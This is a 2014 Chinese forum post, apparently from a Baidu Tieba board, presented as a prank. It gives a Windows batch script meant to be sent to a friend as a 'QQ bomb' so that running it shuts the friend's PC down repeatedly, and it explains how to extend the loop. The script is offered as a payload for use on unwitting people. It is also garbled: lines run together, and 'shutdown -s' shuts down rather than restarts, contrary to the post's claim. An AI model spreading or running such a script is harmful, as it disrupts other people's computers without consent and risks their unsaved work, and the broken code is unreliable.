荒... 发表于 2014-7-9 12:40:36

【申精】【恶搞】重启好友的电脑

一个非常简单的bat文件使用,这里可以当成QQ炸弹用。 以下的代码,如果你让对方点击了,他的电脑会连续重启5次。
if not exist c:\1.txt echo.>c:\1.txt&goto err1 if not exist c:\2.txt echo.>c:\2.txt&goto err1 if not exist c:\3.txt echo.>c:\3.txt&goto err1 if not exist c:\4.txt echo.>c:\4.txt&goto err1 if not exist c:\5.txt echo.>c:\5.txt&goto err1goto err2 :err1
shutdown -s -t 0 :err2
复制完以后,保存到记事本,把记事本文件更改为 .bat 后缀的文件。如果你想让对方连续重新启动,那就无限的增加下去,如在 if not exist c:\5.txt echo.>c:\5.txt&goto err1后面增加ifnot exist c:\5.txt echo.>c:\6.txt&goto err1http://static.tieba.baidu.com/tb/editor/images/client/image_emoticon25.png@墨裔
页: [1]
查看完整版本: 【申精】【恶搞】重启好友的电脑